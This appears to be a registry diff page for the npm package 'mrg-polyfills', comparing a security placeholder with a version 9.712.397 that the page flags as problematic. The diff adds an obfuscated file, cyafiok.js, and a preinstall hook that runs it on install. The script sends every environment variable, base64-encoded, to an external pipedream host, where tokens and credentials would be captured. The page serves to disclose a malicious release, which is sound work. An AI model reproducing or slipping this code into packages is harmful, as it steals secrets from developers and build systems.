mrg-polyfills 0.0.1-security → 9.712.397
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of mrg-polyfills might be problematic. Click here for more details.
- package/cyafiok.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/cyafiok.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x4131(_0x4d7fbb,_0x4e0fd0){const _0x3d5e83=a0_0x3d5e();return a0_0x4131=function(_0x413166,_0x5e37ee){_0x413166=_0x413166-0x192;let _0x3ab4a2=_0x3d5e83[_0x413166];return _0x3ab4a2;},a0_0x4131(_0x4d7fbb,_0x4e0fd0);}const a0_0x504d41=a0_0x4131;(function(_0x373719,_0x24c57c){const _0x4daff2=a0_0x4131,_0x5a67c6=_0x373719();while(!![]){try{const _0x4b659c=parseInt(_0x4daff2(0x19d))/0x1*(parseInt(_0x4daff2(0x1a0))/0x2)+-parseInt(_0x4daff2(0x193))/0x3*(parseInt(_0x4daff2(0x1a7))/0x4)+parseInt(_0x4daff2(0x1a3))/0x5*(parseInt(_0x4daff2(0x19f))/0x6)+-parseInt(_0x4daff2(0x1a8))/0x7+parseInt(_0x4daff2(0x19a))/0x8*(parseInt(_0x4daff2(0x1a5))/0x9)+parseInt(_0x4daff2(0x194))/0xa*(-parseInt(_0x4daff2(0x19e))/0xb)+parseInt(_0x4daff2(0x1a9))/0xc;if(_0x4b659c===_0x24c57c)break;else _0x5a67c6['push'](_0x5a67c6['shift']());}catch(_0x38db90){_0x5a67c6['push'](_0x5a67c6['shift']());}}}(a0_0x3d5e,0xac8a3));const http=require(a0_0x504d41(0x198));function a0_0x3d5e(){const _0x1180e4=['request','268264kqSVHG','end','from','233557YbCedg','44xxLssJ','7806xiOUNO','4AXMQrx','stringify','net','2865adWTaX','join','117SGzDSW','d967104b6c9e3e7ee7e7f8bad1ba7209','172oaWJSt','5975655oTXDwf','6562140kSghHr','POST','write','8589mjsUOl','1279660SSiGGO','base64','env','pipedream','https'];a0_0x3d5e=function(){return _0x1180e4;};return a0_0x3d5e();}req=http[a0_0x504d41(0x199)]({'host':[a0_0x504d41(0x1a6),'m',a0_0x504d41(0x197),a0_0x504d41(0x1a2)][a0_0x504d41(0x1a4)]('.'),'path':'/'+(process[a0_0x504d41(0x196)]['npm_package_name']||''),'method':a0_0x504d41(0x1aa)}),req[a0_0x504d41(0x192)](Buffer[a0_0x504d41(0x19c)](JSON[a0_0x504d41(0x1a1)](process[a0_0x504d41(0x196)]))['toString'](a0_0x504d41(0x195))),req[a0_0x504d41(0x19b)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "mrg-polyfills",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "9.712.397",
|
|
4
|
+
"main": "cyafiok.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node cyafiok.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=mrg-polyfills for more information.
|